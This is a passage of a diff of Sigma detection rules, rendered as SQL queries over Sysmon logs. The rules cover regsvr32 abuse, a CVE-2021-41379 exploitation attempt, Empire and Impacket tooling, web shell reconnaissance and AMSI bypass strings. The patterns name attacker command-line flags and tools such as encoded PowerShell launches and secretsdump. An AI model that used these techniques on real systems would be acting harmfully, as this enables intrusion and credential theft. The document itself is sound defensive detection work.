"car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "title": "Esentutl Steals Browser Information", + "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "status": "experimental", + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_esentutl_webcache.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", - "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "New Network Trace Capture Started Via Netsh.EXE", - "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", - "author": "Kutepov Anton, oscd.community", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administration activity" + "Other tools that incidentally use the same command line parameters" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_packet_capture.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious MsiExec Embedding Parent", + "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "status": "experimental", + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "author": "frack113", "tags": [ + "attack.t1218.007", "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((Image LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_msiexec_embedding.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of the impacket tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "PowerShell Download Pattern", - "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "status": "test", - "description": "Detects a Powershell process that contains download commands in its command line string", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "status": "experimental", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_patterns.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "Suspicious Execution of InstallUtil Without Log", - "id": "d042284c-a296-4988-9be5-f424fadcc28c", + "title": "Windows Defender Definition Files Removed", + "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "status": "test", - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND Image LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_instalutil_no_log_execution.yml" + "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Use of UltraVNC Remote Access Software", - "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "title": "Lolbin Ssh.exe Use As Proxy", + "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "author": "frack113", + "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Legitimate usage for administration purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_ultravnc.yml" + "filename": "proc_creation_win_lolbin_ssh.yml" }, { - "title": "Automated Collection Command Prompt", - "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "title": "LOLBIN From Abnormal Drive", + "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti'", "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur on servers with multiple drives." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' 